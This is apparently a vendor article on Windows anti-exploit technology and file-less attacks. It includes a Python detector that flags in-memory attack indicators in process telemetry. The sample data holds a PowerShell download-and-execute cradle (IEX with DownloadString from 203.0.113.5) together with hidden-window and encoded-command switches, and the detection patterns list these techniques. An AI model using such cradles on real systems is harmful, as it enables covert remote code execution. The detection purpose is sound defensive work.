- All attacks include malicious activity, but not all attacks include writing malware to disk
- Anti-exploit technology prevents attackers from gaining a foothold
- What to look for in anti-exploit technology
Attacks, exploits and vulnerabilities
Any complete cloud workload security stack must feature robust anti-exploit technology for both end-user and server systems. Cloud workloads run on servers, either on-premises or in the cloud, and end-user systems access those workloads. End-user systems can give attackers indirect access to workload data, while servers can provide more direct access if attackers achieve a foothold.
When trying to gain access to a Windows system, attackers exploit vulnerabilities, known or unknown (zero-day). The exploits may be novel or part of a widely used exploit kit. The vulnerabilities may lie in the Windows operating system itself or in applications running on it, and the vulnerable component may run in kernel mode or user mode, giving the attacker a different level of privilege in each case. Attackers may also chain exploits to elevate privilege locally once they have gained a remote foothold, or move laterally by attacking other systems from the compromised one.
File-less attacks
Organizations commonly assume the goal of an attack is to place malware on a system. For ransomware or cryptojacking this is true, but it is not true in general. In a file-less attack, the malicious activity happens entirely in memory: no file is written to disk for traditional anti-virus to scan. Instead, the attacker exploits a vulnerability and then runs commands on the system remotely, using it to attack other systems or to exfiltrate sensitive data.
Detecting the signs of a successful attack is important. Endpoint Detection and Response (EDR) and Managed Detection and Response (MDR) solutions do just that: they look for indicators of compromise and indicators of attack. Anti-exploit technology, by contrast, aims to detect and block the attack earlier in the attack cycle, at the point where the attacker is attempting to exploit a vulnerability to gain initial access to the system.
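As an added example (not code from this page or from Bitdefender), the script below shows the kind of indicator-of-attack check a detection layer applies to process-creation telemetry once a file-less attack is already running: a user-facing application spawning a script host, a PowerShell -EncodedCommand argument decoded from base64/UTF-16LE, and command-line fragments that stage a payload straight into memory. The log format, its field names, the parent/child lists and the sample events are all assumptions constructed for the example.

```python
"""Flag indicators of attack for file-less, in-memory activity in Windows
process-creation telemetry.

Assumptions (not from the original page): events are JSON lines carrying the
fields "pid", "image", "parent_image" and "command_line". The sample events at
the bottom are constructed for this example, not captured data.
"""
import base64
import json
import re

# Applications that normally should not be spawning script hosts (assumed list).
USER_FACING_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                       "msedge.exe", "chrome.exe", "firefox.exe", "acrord32.exe"}
# Children that can run attacker-supplied code without dropping a file (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}
# Command-line fragments typical of in-memory staging and evasion.
IN_MEMORY_PATTERNS = [
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory script execution"),
    (re.compile(r"downloadstring|invoke-webrequest|net\.webclient", re.I),
     "remote payload fetched into memory"),
    (re.compile(r"reflection\.assembly\]::load|frombase64string", re.I),
     "reflective/base64 loader"),
    (re.compile(r"-nop\b|-noprofile\b|-w(indowstyle)?\s+hidden|-ep\s+bypass"
                r"|-exec(utionpolicy)?\s+bypass", re.I), "evasion switches"),
]
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    """Lower-cased file name of a Windows path (either separator accepted)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument, or None if absent.
    PowerShell encodes the script as base64 over UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event):
    """Return a list of (rule, detail) findings for one process-creation event."""
    findings = []
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmdline = event.get("command_line", "")
    if parent in USER_FACING_PARENTS and image in SCRIPT_HOSTS:
        findings.append(("suspicious-parent", f"{parent} spawned {image}"))
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append(("encoded-command", decoded))
    # Scan the visible command line and the decoded script together.
    text = cmdline if decoded is None else cmdline + " " + decoded
    for pattern, label in IN_MEMORY_PATTERNS:
        if pattern.search(text):
            findings.append(("in-memory", label))
    return findings


def scan_log(lines):
    """Run every rule over JSON-lines telemetry; return {pid: findings} for hits only."""
    hits = {}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        findings = analyse_event(event)
        if findings:
            hits[event["pid"]] = findings
    return hits


# Constructed sample telemetry (not real captured events).
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_LOG = [
    json.dumps({"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"}),
    json.dumps({"pid": 4188, "image": r"C:\Windows\System32\notepad.exe",
                "parent_image": r"C:\Windows\explorer.exe",
                "command_line": "notepad.exe report.txt"}),
    json.dumps({"pid": 4210, "image": r"C:\Windows\System32\rundll32.exe",
                "parent_image": r"C:\Windows\System32\svchost.exe",
                "command_line": "rundll32.exe shell32.dll,Control_RunDLL"}),
]

if __name__ == "__main__":
    for pid, findings in scan_log(SAMPLE_LOG).items():
        for rule, detail in findings:
            print(f"pid {pid}: [{rule}] {detail}")
```

Only the first sample event trips the rules: Word spawning PowerShell, an encoded command, and, once decoded, an IEX of a script fetched over the network plus the usual evasion switches. Note that every one of these signals appears after exploitation has already succeeded, which is the gap the anti-exploit layer described above is meant to close.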
What to look for in anti-exploit solutions
Part of a complete prevention and detection stack managed from a single console
- Point solutions have value, but tend to add administrative overhead when they are not part of a wider approach
- Look for a solution that encompasses multiple security techniques, from signatures to advanced machine learning and threat-hunting capabilities
Coverage of both kernel- and user-mode exploits of known and unknown vulnerabilities
- Detecting yesterday’s attacks is easy; preventing tomorrow’s attacks is difficult
- Look for a solution with advanced detection and mitigation that includes the full software stack in your environment
Applicable across on-premises and cloud, end-user and server systems
- Adoption of hybrid and multi-cloud architectures has created complexity, which raises security costs
- Look for a solution that covers where your architecture is today, and will be tomorrow
Support for Virtual Desktop Infrastructure, including full-session, terminal services hosts and Remote Desktop Protocol
- Work-from-home won’t end any time soon
- Look for a solution with minimal impact on performance and administration
While anti-exploit technology for Windows systems is not a panacea, it is a critical part of the security stack. Focused yet generic detection and mitigation techniques that prevent the abuse of common classes of vulnerability stop attacks before a foothold is gained. Attackers will continue to discover and exploit vulnerabilities in Windows systems and in the popular applications they run.
Bringing it all together
Hybrid and multi-cloud environments give organizations tremendous flexibility in pursuing business goals, but they also introduce complexity for security teams. Even after a zero-day vulnerability is disclosed, teams struggle to patch systems quickly, especially servers, and to update their controls while vendors are still identifying new exploits and variants. This is where strong anti-exploit capabilities fill the gap: by detecting and mitigating exploit attempts, they stop attacks in their early stages.
Bitdefender GravityZone provides enhanced anti-exploit for Windows capabilities. Learn more and get your free trial here: https://www.bitdefender.com/business/enterprise-products/virtualization-security.html